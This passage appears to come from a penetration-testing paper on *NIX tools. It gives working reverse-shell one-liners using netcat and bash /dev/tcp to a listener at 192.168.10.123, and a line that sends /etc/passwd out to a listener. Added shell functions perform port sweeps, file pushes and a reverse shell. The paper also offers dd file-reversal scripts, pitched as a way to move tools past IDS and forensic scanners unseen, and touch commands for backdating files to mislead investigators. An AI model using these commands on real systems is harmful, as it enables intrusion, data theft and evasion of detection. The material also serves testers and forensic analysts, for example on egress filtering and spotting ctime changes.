The result: the attacker has a command shell to your system through your firewall. This even works on firewalls that block ALL incoming traffic. As a tester, you can do the same, as packet filters are easily fooled. A good proxy-level firewall is not, but there are fewer and fewer of these being used.

The worst thing is that tools such as metasploit (http://www.metasploit.com/) make this even easier. They bundle the exploit and tools into a single payload that even a novice script kiddie can use. So filter that outgoing Internet traffic before it is too late!


Oops - I forgot to install netcat ...

Netcat does not exist on all systems. It is common on many Linux systems, but less commonly installed on UNIX. In the event that netcat is not installed as a client program on a system, and when we cannot install netcat, there are options in both /dev/tcp and /dev/udp. These are not real device files: bash (and ksh93) recognise the paths and open a socket when you redirect to them, so the redirections below must be run from bash even when the shell being spawned is csh.

    /dev/tcp/[IPaddress]/[port]
    /dev/udp/[IPaddress]/[port]

So for our UDP 53 example this becomes:

    /dev/udp/192.168.10.123/53

For the shell this becomes:

    /bin/csh -i > /dev/tcp/[IPaddress]/[port] 0<&1 2>&1
    /bin/csh -i > /dev/udp/[IPaddress]/[port] 0<&1 2>&1

And hence, we can obtain the functionality of netcat with the tools and devices that exist on any *NIX system with bash. As an example, the script line below shovels a shell from the target host to a waiting netcat listener (nc -l -u -p 53 on 192.168.10.123). We can enter commands on the host that act as a reverse shell.

    /bin/csh -i > /dev/udp/192.168.10.123/53 0<&1 2>&1

The critical point is that we can use netcat on our local system even when the remote system under test does not have netcat. And, of course, if netcat is not installed on the client, we can still use a makeshift client such as:

    # cat /etc/passwd > /dev/tcp/[IP_Address_of_Listener]/[Listener_Port]
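The /dev/tcp trick extends naturally to the "scan the inside of the network" case from the start of this article and to the file push just above. The functions below are an added example, not the author's code: they need nothing but bash and, optionally, the coreutils timeout command, so they run on a target where netcat was never installed. Because /dev/tcp is a bash feature, each network operation is handed to "bash -c" explicitly and the host, port and file name are passed as positional parameters rather than pasted into the command string, so a hostile port list or file name cannot turn into shell code. Listener addresses and ports are placeholders you supply.

```shell
#!/bin/sh
# devtcp.sh - added example: netcat substitutes built on bash's /dev/tcp.
# Runs under any POSIX sh; the socket work is delegated to bash because
# /dev/tcp and /dev/udp are recognised by bash (and ksh93), not the kernel.

# is_port N: true if N is a decimal number in 1..65535.
is_port() {
    case $1 in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# tcp_probe HOST PORT [SECONDS]: exit 0 if a TCP connect to HOST:PORT
# succeeds, 1 if it is refused, filtered (timeout) or the port is invalid.
# HOST and PORT reach bash as $1/$2; they are never interpolated into the
# script text, so "1; rm -rf /" as a port is rejected, not executed.
tcp_probe() {
    is_port "$2" || return 1
    secs=${3:-2}
    if command -v timeout >/dev/null 2>&1; then
        timeout "$secs" bash -c 'exec 3<>"/dev/tcp/$1/$2"' _ "$1" "$2" 2>/dev/null
    else
        bash -c 'exec 3<>"/dev/tcp/$1/$2"' _ "$1" "$2" 2>/dev/null
    fi
}

# tcp_sweep HOST PORT...: print the open ports, one per line. A port scan
# of a host INSIDE the firewall with no scanner installed on the box.
tcp_sweep() {
    host=$1; shift
    for p in "$@"; do
        tcp_probe "$host" "$p" && echo "$p"
    done
    return 0
}

# push_file FILE HOST PORT: send FILE to a listener started on HOST with
# "nc -l -p PORT > received.bin" (the /etc/passwd example on this page).
push_file() {
    [ -r "$1" ] && is_port "$3" || return 1
    bash -c 'cat "$1" > "/dev/tcp/$2/$3"' _ "$1" "$2" "$3"
}

# reverse_shell HOST PORT: shovel an interactive bash to "nc -l -p PORT"
# on HOST, with stdin, stdout and stderr all on the one socket.
reverse_shell() {
    is_port "$2" || return 1
    bash -c 'exec bash -i >&"/dev/tcp/$1/$2" 0>&1' _ "$1" "$2"
}
```

Typical use on the target: "tcp_sweep 10.0.0.5 22 25 80 443 3306" to see what is listening on a neighbour, then "push_file /etc/passwd 192.168.10.123 53" once "nc -l -p 53 > passwd" is waiting on your own host. The timeout matters: a filtered port never answers, and without it a sweep of a firewalled host hangs on the first port.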


Filtering connections

An exercise to try is to set up restrictions on the source IP that is allowed to connect. Netcat can be configured to accept connections only from a predefined source IP address: the original netcat takes an optional remote host (and port) after the listen options, and then only a connection from that host is accepted. This makes the connection operate like TCP Wrappers and is similar to a firewall for the individual service. It is no substitute for one, though: the check is made by netcat after the connection is accepted, and a UDP source address is trivially spoofed.


Sending compressed files

In this example, the data received is piped into tar. By running tar with the "v" option (verbose) we can see the filenames; they are printed to STDOUT (generally the screen). Omit this if you want to script this or otherwise automate the process (less noise). To compress the output, also run tar with the "z" flag. This will automatically run the gzip compression program over the output.

Note

Not all implementations of tar support the "z" flag and it may be necessary to pipe the tar'd output to gzip in a separate step.

To do this we use the commands:

Client

    # tar cfpz - /[directory path]/[File] | /bin/nc -w 3 [Destination Host IP] [Listener-Port]

or for an entire directory, just:

    # tar cfpz - /[directory path] | /bin/nc -w 3 [Destination Host IP] [Listener-Port]

Listener

    # nc -l -p [Listener-Port] | tar xfpvz -

On the listener we reverse the process in this example and restore the files.

For the details on how to use tar see: http://www.linuxcommand.org/man_pages/tar1.html.


Alternatively

Together, dd and netcat make a great way to either back up a system (and all slack, etc.) or to remotely obtain a forensically sound copy of a partition, drive, memory, etc. Say we want to make an image of /dev/hdb1 (a partition, but the entire drive can also be copied with /dev/hdb); we can use the following commands:

Client

    # dd if=/dev/hdb1 | nc -v -w 15 [Netcat Listener IP] 1200

Listener

    # nc -l -v -w 15 -p 1200 | dd of=/tmp/image_hdb1.dd

There are other options with dd that can be incorporated and I have these in other posts. In this case, I have used TCP 1200 as the port, but this can be anything that is not in use. UDP could be used as well, but it has no retransmission, so a dropped datagram silently corrupts the image; stick to TCP for anything you intend to call forensically sound, and hash the source device and the image (sha256sum or md5sum) on both ends so the copy can be shown to be complete.

This image can now be cloned to other hosts, used as a backup to be restored to the original, if needed, or used for forensic analysis. You can also test the system remotely without leaving a further trail.


DD

DD is the Swiss army knife of file tools; with /dev/tcp it can also be a network tool (but nc is simpler).

First we need the basics for DD. For this we have the man page and some definitions. I have taken (blatantly paraphrased) the man file info for DD and included this below (which is simple to obtain: "man dd").

For the purpose of a task such as reversing files and swapping them, we need to concentrate on the following options:

• bs: the block size. Setting "bs=1" means that we can use dd as a byte-level (instead of a block-level) tool. A byte is the smallest unit dd can address, so where this article says "bit" in connection with bs=1 it means a single byte. Although it does slow down the process from a block copy, we are not looking at how fast we can copy here.

• skip: skip "n" input blocks before copying. With "bs=1" that is "n" bytes.

• count: copy only this many blocks (a single one, in our case).

What we are going to do is start with "n" set to the position of the last byte in the file. We will loop the dd command to copy byte "n", then "n - 1", "n - 2", ... down to byte 1. This means byte n gets copied to position 1, byte "n - 1" to position 2, ..., and byte 1 to position n.

In other words, counting offsets from zero as dd's skip does, we copy the byte at offset "n - 1 - i" in the source file to offset "i" in the destination file, for i from 0 to n - 1.


How to reverse a file with dd

Reversing a file is actually fairly simple; a small shell script executed with the length of the file (in bytes) is all that is required. You can either use a default block size (where the individual blocks will be moved into a reverse order), or set the block size to 1 in order to completely reverse the file. The flag "bs=1" is added in order to copy the entire file in reverse, byte by byte.

If the size of the file and its name are known beforehand, the script is particularly simple (note that this script uses the "count" command to generate the sequence, which is not found on all systems; "seq" does the same on Linux):

    J=[file size]
    F=[file to copy]
    for i in `count 0 $J`; do
        # byte J-i of the input becomes the next byte of the output
        dd conv=noerror bs=1 count=1 skip=`expr $J - $i` if=$F >> $F.out
    done


In the event that you do not know the size of the file, the following script can be used, or if you want to incorporate this into a script that changes multiple files at once you need to feed more information into the script (including a file descriptor). This script is a little messy (I have not made any effort to tidy it up), but does the trick.

    #!/bin/bash
    #
    # This is a small utility script that will reverse the
    # file that a user inputs.
    # It is not coded securely and presumes the directory for a
    # number of commands - change this to run it in a real environment.
    # The main thing is a proof of concept anti-forensic tool.
    # This script, by reversing files, will make the file
    # undetectable as a type of file by commercial file checkers.
    # Run it in reverse to get the original back.
    #
    # Author: Craig S Wright

    # Set the file to reverse
    echo "Enter the name (and path if necessary) of the file you want to reverse:"; read FILE

    # Work out the file size (bytes, column 5 of ls -l)
    SIZE_OF_FILE=`/bin/ls -l $FILE | awk '{print $5}'`
    i=0

    # The script - not pretty - but the idea was all I was aiming at
    K=`expr $SIZE_OF_FILE - $i`
    /bin/dd conv=noerror bs=1 skip=$K if=$FILE count=1 > $FILE.out
    i=`expr $i + 1`
    J_Plus=`expr $SIZE_OF_FILE + 1`

    while [ "$i" != "$J_Plus" ]
    do
        K=`expr $SIZE_OF_FILE - $i`
        /bin/dd conv=noerror bs=1 skip=$K if=$FILE count=1 >> $FILE.out
        i=`expr $i + 1`
    done


To go a little further and add some options, I have included the following example. I have NOT added input checking or other NECESSARY security controls. This is quick and nasty only. Please fix the paths and input checking if you want to run it.

The following script is called reverse.sh:

    #!/bin/bash
    #
    # reverse.sh
    #

    # Set the file to reverse - I DO NOT check if the file
    # actually exists - you should!
    echo "Enter the name (and path if necessary) of the file you want to reverse:"; read FILE

    # Set the file where the reversed file is to be saved - I DO
    # NOT check if the file actually exists - you should!
    # Default File output = FILE.out (used if nothing is entered)
    echo "Enter the name (and path if necessary) of the file you want the output saved as (must be different to the input, default $FILE.out):"; read FILE_OUT
    FILE_OUT=${FILE_OUT:-$FILE.out}

    # Set the Block Size. This defaults to bs=1 (one byte) for dd
    # if nothing is entered.
    echo "Enter the Block Size (the default = 1 byte):"; read BS_SIZE
    BS_SIZE=${BS_SIZE:-1}

    # Work out the file size in bytes, then in blocks of BS_SIZE
    # (rounded up so a partial last block is still copied)
    SIZE_OF_FILE=`/bin/ls -l $FILE | awk '{print $5}'`
    SIZE_OF_FILE=`expr \( $SIZE_OF_FILE + $BS_SIZE - 1 \) / $BS_SIZE`
    i=0

    # The script - not pretty - but the idea was all I was aiming at
    K=`expr $SIZE_OF_FILE - $i`
    /bin/dd conv=noerror bs=$BS_SIZE skip=$K if=$FILE count=1 > $FILE_OUT
    i=`expr $i + 1`
    J_Plus=`expr $SIZE_OF_FILE + 1`

    while [ "$i" != "$J_Plus" ]
    do
        K=`expr $SIZE_OF_FILE - $i`
        /bin/dd conv=noerror bs=$BS_SIZE skip=$K if=$FILE count=1 >> $FILE_OUT
        i=`expr $i + 1`
    done

    # The end ...

To use the previous script enter:

    $ ./reverse.sh

Enter the name of the file you want to reverse and the block size (best left at 1, that is, one byte). This will return the byte-wise reversed file. If you want to verify it, run it twice and use "cmp" (or "diff") to validate that the same file is returned. This will reverse the reverse and get the original back.

This works on text and binary files and, with a little tweaking, you can reverse headers but leave the body the same, reverse the body after skipping the file header and many more options.
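The same idea written as a pair of reusable functions, as an added example rather than the author's scripts: the size comes from wc instead of parsing ls output, dd moves one byte per iteration (bs=1 is the smallest unit dd has), the output file is refused if it already exists or is the input, and a round-trip check confirms that reversing twice gives the original back. reverse_tail keeps a fixed-length header intact and reverses only the body, which is the "skip the file header" variation mentioned above. File names are whatever you pass in; the sample content in the test is constructed.

```shell
#!/bin/sh
# reverse_dd.sh - added example: byte-wise file reversal with dd, with the
# overwrite check and the round-trip verification the article suggests.

# file_size FILE: size in bytes, without parsing ls output.
file_size() {
    wc -c < "$1" | tr -d ' '
}

# is_count N: true if N is a non-negative decimal number.
is_count() {
    case $1 in ''|*[!0-9]*) return 1 ;; esac
}

# reverse_file IN OUT: write IN to OUT with its bytes in reverse order.
# One dd per byte (bs=1 skip=K count=1), so it is slow but exact, and it
# never touches IN. Refuses to clobber an existing OUT.
reverse_file() {
    rin=$1; rout=$2
    [ -f "$rin" ] || { echo "no such file: $rin" >&2; return 1; }
    [ "$rin" != "$rout" ] || { echo "input and output must differ" >&2; return 1; }
    [ ! -e "$rout" ] || { echo "refusing to overwrite $rout" >&2; return 1; }
    : > "$rout"
    k=$(file_size "$rin")
    while [ "$k" -gt 0 ]; do
        k=$((k - 1))
        # byte at offset k of the input is appended as the next output byte
        dd if="$rin" bs=1 skip="$k" count=1 2>/dev/null >> "$rout"
    done
}

# reverse_tail IN OUT HDR: copy the first HDR bytes unchanged, then the
# rest of IN reversed. With a bitmap header this is the upside-down
# picture trick; with a tool binary it keeps the magic bytes intact.
reverse_tail() {
    tin=$1; tout=$2; hdr=$3
    is_count "$hdr" || return 1
    [ -f "$tin" ] && [ "$tin" != "$tout" ] && [ ! -e "$tout" ] || return 1
    dd if="$tin" bs=1 count="$hdr" 2>/dev/null > "$tout"
    k=$(file_size "$tin")
    while [ "$k" -gt "$hdr" ]; do
        k=$((k - 1))
        dd if="$tin" bs=1 skip="$k" count=1 2>/dev/null >> "$tout"
    done
}

# roundtrip_ok FILE: reverse twice into a scratch directory and compare
# with cmp. Returns 0 if the double reversal reproduces FILE exactly.
roundtrip_ok() {
    td=$(mktemp -d) || return 1
    reverse_file "$1" "$td/r1" && reverse_file "$td/r1" "$td/r2" && cmp -s "$1" "$td/r2"
    rc=$?
    rm -rf "$td"
    return $rc
}
```

Because each byte costs a fork and exec of dd, this is fine for a small tool or a document and painfully slow for a disk image; the point is the dd addressing (skip counts blocks of bs bytes from the start of the input), not throughput.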

I have yet to find a forensic tool that will find reversed 
text if you are not looking for it. Also, this is a simple way 
of passing tools when an IDS/IPS is in use. The reversed 
files are not found in default scans. This has been tested 
with several of the leading IDS products. In all cases, it 
was possible to send tools without setting an alert. 

With time and practice, you can create a loader script 
that will take the reversed file and execute it directly into 
memory. This leaves no copy of the original file to be un- 
covered with a Host based IDS. 

The script example above has the file output written without checking if a file exists. The following is an example of how you can add a small amount of script to verify that you are not overwriting an existing file:

    if [ -f $FILE_OUT ]
    then
        echo "The file [$FILE_OUT] that you are seeking to write already exists"
        printf '%s' "Do you want to overwrite the existing file? ( y/n ) : "
        read RESPONSE
        if [ "$RESPONSE" = "n" ] || [ "$RESPONSE" = "N" ]
        then
            echo "The file will not be overwritten and the process will abort!"
            exit
        fi
    fi


It is also a good idea to use the full path in a script, or to set PATH explicitly at the top of it. Users can change the path variables they are exposed to and, unless you set these (either explicitly or by adding a profile for the script to use), an attacker could use a system script to run their own binary.

The key to successfully testing a system and validating the security state of that system is to think outside the box. For instance, there are several reasons why you would want to reverse a file for testing:

• Attackers could do this to bypass filters, controls and other protections
• Anti-forensics: finding the needle in a haystack is difficult, especially when the tools do not help
• Pen Testing: just as in point 1 for attackers, the tester can use this to load tools without being detected by filters or through malware detection engines


Once a file has bypassed the perimeter controls, get- 
ting it to work inside an organization is simple. Hence, 
a means to bypass controls is of interest to those on the 
attack side of the equation (both validly and less so). 

Next, it is a concern to the forensic professional. Hiding 
files through reversing them makes the process of discov- 
ery a proverbial search for the needle in a haystack. 

An interesting effect to try is to maintain the header on 
a bitmap file (i.e. skip the first portion of the file and re- 
verse the later parts). What ends up occurring is that the 
image can be recreated upside down. All types of interest- 
ing effects can be found. 

As always, the cards are stacked in favor of the attack- 
er. When in a contest that pits rules against open moral- 
ity, rules lose more than not. This does not mean that we 
give up, only that we have to understand the odds that are 
stacked against us and that it is also the case that people 
naturally err. This is when we (the “good” guys) win. 

For security professionals to be successful, we need to 
think outside the box. 


touch

The *NIX touch command can be used to change the access and modification times on an existing file or directory or to create a new file. There is a common belief that the touch command can change any time entry (including the change time or, on some systems, the create time); this is not correct. The change time (ctime) is set by the kernel whenever the inode is written, so touching a file actually moves its ctime to "now"; that is the giveaway an investigator looks for. The change time and created time of a file need to be modified in other ways (such as extracting files from TAR archives, or altering the system clock before touching).

If a file does not exist on the system, the touch command will create it. The touch command can be used to update or create the access and modification times, setting these to a specified predefined value. If the option to set a new timestamp is not used, the command will set the current time.

The command's options include:

• -a: change the access time only
• -m: change the modification time only
• -r <file>: set the access and modification times of the file being changed to be the same as those of <file>
• -t <time>: set the time specified by <time> when updating the access and modification times

The touch command uses the format [[cc]yy]MMDDhhmm[.ss]. These are defined as follows:

• MM: the two-digit numeric month,
• DD: the two-digit numeric day,
• hh: the two-digit numeric hour,
• mm: the two-digit numeric minutes,
• ss: the two-digit seconds,
• cc: the first two digits of the year, and
• yy: the last two digits of the year.

The touch command can be used without options to set the current time. This is done to simulate an update to a file without actually accessing it. For an attacker, this can be used to hide an attack. Setting a false path can lead an investigator into checking the wrong files and wasting valuable time.

For instance, running "touch /bin/sh" could be used to lead an investigator into checking the use of the "/bin/sh" command shell when another shell was really used. The contents of the "/bin/sh" file are not changed; the timestamps are updated to reflect the system's current date and time. Alternatively, an attacker could also change the timestamps of files to have these seem to have been accessed at any other time (including a time in the future).

If you know that an administrator logs into a system at 9.30 am each day, you could set the files touched in the login process back to the prior day (for instance, to Monday 9th March 2009):

    touch -a -t 200903090932.21 /bin/csh

This command will change the access time of the "/bin/csh" command shell to March 9th, 2009 at 9:32:21am. Setting a time other than "now" requires owning the file or being root, and the ctime of /bin/csh will now read as the moment you ran the command.

One unfortunate aspect of the touch command is that it is not recursive. You have to touch each file or create a script to do this. Fortunately, this is simple. For example, linking the find command to touch using exec will allow you to selectively update a number of files and even recurse through directories:

    find . -exec touch {} \;
    find . | xargs touch
    find . -print0 | xargs -0 touch

Where long file names and spaces are used, the last find option above will handle this.

The real secret is to use the touch command in scripts. As you run an attack to validate a system, update the access time to that which it previously was set to.
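Added example, not from the article: the touch idioms above as shell functions, alongside stat calls that show what actually changed. backdate sets atime and mtime to a fixed UTC stamp, clone_times copies a neighbour's times with touch -r, backdate_tree is the find/xargs form, and ctime_moved demonstrates the point made at the start of this section: whatever you set, the change time jumps to "now", because writing the timestamps is itself an inode change. GNU stat -c is used with a BSD stat -f fallback; the 2009 stamp is the one from the text, the file names are placeholders.

```shell
#!/bin/sh
# touchtimes.sh - added example: timestamp manipulation with touch, and
# the ctime side effect that gives it away. GNU stat (-c) with a BSD/macOS
# stat (-f) fallback. All times are reported as epoch seconds.

mtime() { stat -c %Y "$1" 2>/dev/null || stat -f %m "$1"; }
atime() { stat -c %X "$1" 2>/dev/null || stat -f %a "$1"; }
ctime() { stat -c %Z "$1" 2>/dev/null || stat -f %c "$1"; }

# backdate FILE STAMP: set atime and mtime to STAMP, in the touch -t
# format [[CC]YY]MMDDhhmm[.SS]. TZ=UTC makes the result host-independent.
backdate() {
    TZ=UTC touch -a -m -t "$2" "$1"
}

# clone_times REF FILE: copy REF's atime and mtime onto FILE (touch -r),
# the usual way to make a dropped file look as old as its neighbours.
clone_times() {
    touch -r "$1" "$2"
}

# backdate_tree DIR STAMP: the recursive form; -print0 / -0 keeps file
# names containing spaces intact.
backdate_tree() {
    find "$1" -type f -print0 | TZ=UTC xargs -0 touch -a -m -t "$2"
}

# ctime_moved FILE STAMP: backdate FILE and report whether its ctime still
# advanced past both its previous value and the new mtime. Prints yes/no.
# Expect "yes": touch cannot set ctime, and the kernel bumps it on the write.
ctime_moved() {
    before=$(ctime "$1")
    sleep 1                       # stat reports ctime in whole seconds
    backdate "$1" "$2"
    after=$(ctime "$1")
    if [ "$after" -gt "$before" ] && [ "$after" -gt "$(mtime "$1")" ]; then
        echo yes
    else
        echo no
    fi
}
```

On the investigation side the same three stat calls are the check: a file whose ctime is later than its mtime by months, or whose ctime clusters with a batch of unrelated files, has been touched after the fact, however plausible the mtime looks in a directory listing.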


Programming tools

It is simple when compilers or other tools are installed on a system. In this event, a tester can simply add any tools that are desired by compiling them on the host. Source code can be uploaded over ASCII connections, such as telnet, so even a console can be used to load your favorite tools when compilers are installed.

In many cases, compilers and other similar tools have been restricted or (ideally) not installed on production systems. Where this is the case, it is still common to discover many related tools (including disassemblers) on a host. Some of these tools are covered in this section.

In many instances, systems will not have tools at your disposal that can easily be used to test privilege escalation. In this instance, it may be necessary to "roll your own" exploit. Stack and heap overflows are all too common in software. Even where patches are available, it is all too common to find patches missing. This can be a result of legacy systems not functioning when the patch is applied, or a simple failure for any reason to have applied the patch.

In these instances, an attacker could exploit a flaw in the software to gain additional privileges on the system (maybe even root).


GDB / DBX

"gdb" is the software debugger on Linux and "dbx" is essentially the same on UNIX. These commands are commonly found on systems where compilers have been removed, as many system administrators are uncertain of their use.

There are many useful tutorials on the web for both gdb and dbx. Some of these include:

• http://www.ece.unm.edu/faculty/jimp/310/nasm/gadb.pdf
• http://dirac.org/linux/gdb/

These are highly advanced tools, so I have left them to the end of this paper. The boon of finding them on a system cannot be beaten. These tools are primarily used when looking for exploitable flaws on a system. If you can copy an executable from the system, this can be run and verified on another *NIX system. Any exploitable flaws can then be discovered and used in the testing and validation process.


objdump

The "objdump" command is a disassembler; it shows you much of what gdb does, but it is not a debugger. This difference means that you can disassemble the executable binary without actually having to execute it. This can come in handy when you are looking for poorly constructed binaries (e.g. those with stack overflows) but are not ready to execute these.

This also gets around the issue where a binary has read privileges for a user account used by the tester but not execute rights.

readelf

The "readelf" command is similar to "objdump" with more detailed information being provided on ELF (Executable and Linking Format) headers. It is used in the analysis of executable binary files to view the GOT (Global Offset Table) and the PLT (Procedure Linkage Table).

ltrace / strace

The "ltrace" tool is used to intercept and record the dynamic library calls a program makes, and the signals it receives, as it runs. It is similar to "strace", which records the system calls a program makes (and the signals it receives) rather than its library calls; ltrace can also show system calls when run with "-S".


Appendixes 
The following pages are a list of Appendixes and provide “MAN” entries and external sources to the paper.


Appendix 1 - *NIX Commands 

The following are a list of the “MAN” or manual pages for a couple of the commands listed in this paper. These will vary with respect to the system they are run on and it is essential to always familiarize yourself with the particularities of the system that you are working on. These pages are taken from the author’s system. These are direct entries from the *NIX “man” entries and have only been slightly modified for style and format. Not all commands used in this paper have been included. A small sample has been copied in order to help you become familiar with the output of the MAN command.

“date” 

The “date” command displays the current time in the given 
FORMAT, or can be used to set the system date. 


• date [OPTION]... [+FORMAT]
• date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]


The command options are:

-d, --date=STRING
display time described by STRING, not ‘now’

-f, --file=DATEFILE
like --date once for each line of DATEFILE

-r, --reference=FILE
display the last modification time of FILE

-R, --rfc-2822
output date and time in RFC 2822 format

--rfc-3339=TIMESPEC
output date and time in RFC 3339 format. TIMESPEC=‘date’, ‘seconds’, or ‘ns’ for date and time to the indicated precision.

-s, --set=STRING
set time described by STRING

-u, --utc, --universal
print or set Coordinated Universal Time.

--help
display this help and exit

--version
output version information and exit.
FORMAT controls the output. The only valid option for the second form specifies Coordinated Universal Time. Interpreted sequences are:

%%     a literal %
%a     locale’s abbreviated weekday name (e.g., Sun)
%A     locale’s full weekday name (e.g., Sunday)
%b     locale’s abbreviated month name (e.g., Jan)
%B     locale’s full month name (e.g., January)
%c     locale’s date and time (e.g., Thu Mar 3 23:05:25 2005)
%C     century; like %Y, except omit last two digits (e.g., 21)
%d     day of month (e.g., 01)
%D     date; same as %m/%d/%y
%e     day of month, space padded; same as %_d
%F     full date; same as %Y-%m-%d
%g     the last two digits of the year corresponding to the %V week number
%G     the year corresponding to the %V week number
%h     same as %b
%H     hour (00..23)
%I     hour (01..12)
%j     day of year (001..366)
%k     hour ( 0..23)
%l     hour ( 1..12)
%m     month (01..12)
%M     minute (00..59)
%n     a newline
%N     nanoseconds (000000000..999999999)
%p     locale’s equivalent of either AM or PM; blank if not known
%P     like %p, but lower case
%r     locale’s 12-hour clock time (e.g., 11:11:04 PM)
%R     24-hour hour and minute; same as %H:%M
%s     seconds since 1970-01-01 00:00:00 UTC
%S     second (00..60)
%t     a tab
%T     time; same as %H:%M:%S
%u     day of week (1..7); 1 is Monday
%U     week number of year with Sunday as first day of week (00..53)
%V     week number of year with Monday as first day of week (01..53)
%w     day of week (0..6); 0 is Sunday
%W     week number of year with Monday as first day of week (00..53)
%x     locale’s date representation (e.g., 12/31/99)
%X     locale’s time representation (e.g., 23:13:48)
%y     last two digits of year (00..99)
%Y     year
%z     +hhmm numeric timezone (e.g., -0400)
%:z    +hh:mm numeric timezone (e.g., -04:00)
%::z   +hh:mm:ss numeric time zone (e.g., -04:00:00)
%:::z  numeric time zone with : to necessary precision (e.g., -04, +05:30)
%Z     alphabetic time zone abbreviation (e.g., EDT)


By default, the “date” command pads numeric fields with zeroes. The following optional flags may follow ‘%’:

-  (hyphen) do not pad the field
_  (underscore) pad with spaces
0  (zero) pad with zeros
^  use upper case if possible
#  use opposite case if possible

After any flags comes an optional field width, as a decimal number; then an optional modifier, which is either E to use the locale’s alternate representations if available, or O to use the locale’s alternate numeric symbols if available.


“dd” 

dd [bs=s] [cbs=s] [conv=conversion] [count=n] [ibs=s] [if=file] [imsg=string] [iseek=n] [obs=s] [of=file] [omsg=string] [seek=n] [skip=n]


DESCRIPTION 

dd reads and writes data by blocks, and can convert the data between formats. dd is often used for devices such as tapes which have discrete block sizes, or for fast multi-sector reads from disks. The conversions can accommodate systems that need de-blocking, conversion to/from EBCDIC and fixed length records.

dd processes input data as follows: 


1. dd reads an input block.

2. If you specified conv=sync and this input block is smaller than the specified input block size, dd pads it to the specified size with null bytes. By also specifying a block or unblock conversion, dd implements spaces instead of null bytes.

3. If bs=size is specified and requested no conversion other than sync or noerror, dd writes the input block (padded where necessary) to the output as a single block and omits the remaining steps.

4. By specifying the swab conversion, dd swaps each pair of input bytes. If there is an odd number of input bytes, dd does not attempt to swap the last byte.

5. dd performs all remaining conversions on the input data independently of the input block boundaries. A fixed-length input or output record may span these boundaries.

6. dd collects the converted data into output blocks of the specified size. When dd reaches the end of the input, it writes the remaining output as a block (with added padding if the conv=sync option is used). Consequently, the final output block can be smaller than the output block size.


Parameters 


bs=size

This option sets both input and output block sizes to size bytes. You can suffix this decimal number with w, b, k, or xnumber to multiply it by 2, 512, 1024, or number, respectively. You can also specify size as two decimal numbers (with or without suffixes) separated by x to indicate the product of the two values. Processing is faster when ibs and obs are equal, since this avoids buffer copying. The default block size is 1b. bs=size supersedes any settings of ibs=size or obs=size. Specifying bs=size with no other conversions than noerror, notrunc, or sync, dd writes the data from each input block as a separate output block. In the event that the input data is less than a full block and you did not request sync conversion, the output block is the same size as the input block.


cbs=size 

Sets the size of the conversion buffer used by various 
conv options. It is possible to specify this option in the 
same way as for bs. 


conv=conversion[, conversion, ...] 
This option specifies conversion method. Conversion can 
be any of the following: 


ascii 

Converts EBCDIC input to ASCII for output. dd copies 
cbs bytes at a time to the conversion buffer, maps them 
to ASCII, then strips trailing blanks, adds a newline, and 
copies this line to the output buffer. 


block

Converts variable-length records to fixed-length records. dd treats the input data as a sequence of variable-length records (each terminated by a newline or an EOF character) independent of the block boundaries. dd converts each input record by first removing any newline characters, then padding (with spaces) or truncating the record to the size of the conversion buffer. dd reports the number of truncated records on the standard error. It is necessary to specify cbs=size with this conversion setting.


ebcdic
Converts ASCII input to EBCDIC for output. dd copies a line of ASCII to the conversion buffer, discards the newline, pads it with trailing blanks to cbs bytes, maps it to EBCDIC and copies it to the output buffer.


ibm 
Converts ASCII to a variant of EBCDIC which gives better 
output on many IBM printers. 


lcase
Converts uppercase input to lowercase.


noerror 
Ignore errors on input. 


notrunc 

The option sets dd so that it does not truncate the output file. If a block is explicitly written, it replaces the existing block; all other blocks are unchanged. See also of=file and seek=n.


swab 

Swaps the order of every pair of input bytes. If the current 
input record has an odd number of bytes, this conversion 
does not attempt to swap the last byte of the record. 


sync 

Pads any input block shorter than ibs to that size with null 
bytes before conversion and output. If you also specified 
block or unblock, dd uses spaces instead of null bytes 
for padding. 


ucase 
Converts lowercase input to uppercase. 


unblock 

Converts fixed-length records to variable-length records by reading a number of bytes equal to the size of the conversion buffer (or the number of bytes remaining in the input, if less than the conversion buffer size), deleting all trailing spaces, and appending a newline character. You must specify cbs=size with this conversion.


convfile 

Deploys convfile as a translation table if it is not one of the conversion formats listed here and it is the name of a file of exactly 256 bytes. It is possible to perform multiple conversions at the same time by separating arguments to conv with commas; however, some conversions are mutually exclusive (for example, ucase and lcase).


count=n 
Copies only n input blocks to the output. 
ibs=size
Sets the input block size to size bytes. Specify this option 
in the same way as bs. 


if=file 
Reads input data from file. If you don’t specify this option, 
dd reads data from the standard input. 


imsg=string 

Displays string when all data has been read from the current volume, replacing all occurrences of %d in string with the number of the next volume to be read. dd then reads and discards a line from the controlling terminal, giving you a chance to change volumes (usually a floppy disk).


iseek=n 

Seeks to the nth block of the input file. The distinction between this and skip is that iseek does not read the discarded data; however there are some devices, such as tape drives and communication lines, on which seeking is not possible, so only skip is appropriate.


obs=size 

Sets the output block size to size bytes. Specify this option 
in the same way as bs. The size of the destination should 
be a multiple of the value chosen for size. For example, 
if you choose obs=10k, the destination’s size should be a 
multiple of 10k. 


of=file 

Writes output data to file. Without setting this option, dd writes data to the standard output. dd truncates the output file before writing to it, unless you specified the seek=n operand. If you specify seek=n, but do not specify conv=notrunc, dd preserves only those blocks in the output file over which it seeks. If the size of the seek plus the size of the input file is less than the size of the output file, this can result in a shortened output file.


omsg=string 

Displays string when dd runs out of room while writing to the current volume. Any occurrences of %d in string are replaced with the number of the next volume to be written. dd then reads and discards a line from the controlling terminal, giving you a chance to change volumes (usually a floppy disk).


seek=n 
Initially seeks to the nth block of the output file. 


skip=n 
Reads and discards the first n blocks of input. 
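As an added example, not from the paper or the dd man page, this POSIX shell script exercises the dd behaviours the entries above describe on a constructed 1000-byte input: the padding added by conv=sync, byte-for-byte verification of an image with cmp, and what seek=n does to an existing output file with and without conv=notrunc. It assumes GNU or BSD dd and a writable temporary directory.

```shell
#!/bin/sh
# Added example (not part of the paper or the dd man page): exercise bs,
# conv=sync and seek with/without conv=notrunc on a constructed input, the
# way a tester verifies an image before trusting it. Assumes GNU or BSD dd.

WORK=${WORK:-$(mktemp -d)}

# Byte count of a file, stripped of the leading spaces BSD wc prints.
size_of() { wc -c < "$1" | tr -d ' '; }

# Constructed source "device": 1000 bytes of 'A', deliberately not a
# multiple of the 512-byte block size used below (built with dd itself).
make_device() {
  [ -s "$WORK/dev.img" ] ||
    dd if=/dev/zero bs=1000 count=1 2>/dev/null | tr '\000' 'A' > "$WORK/dev.img"
}

# Plain copy: the short final input block becomes a short output block,
# so the image stays 1000 bytes and is byte-for-byte identical to the source.
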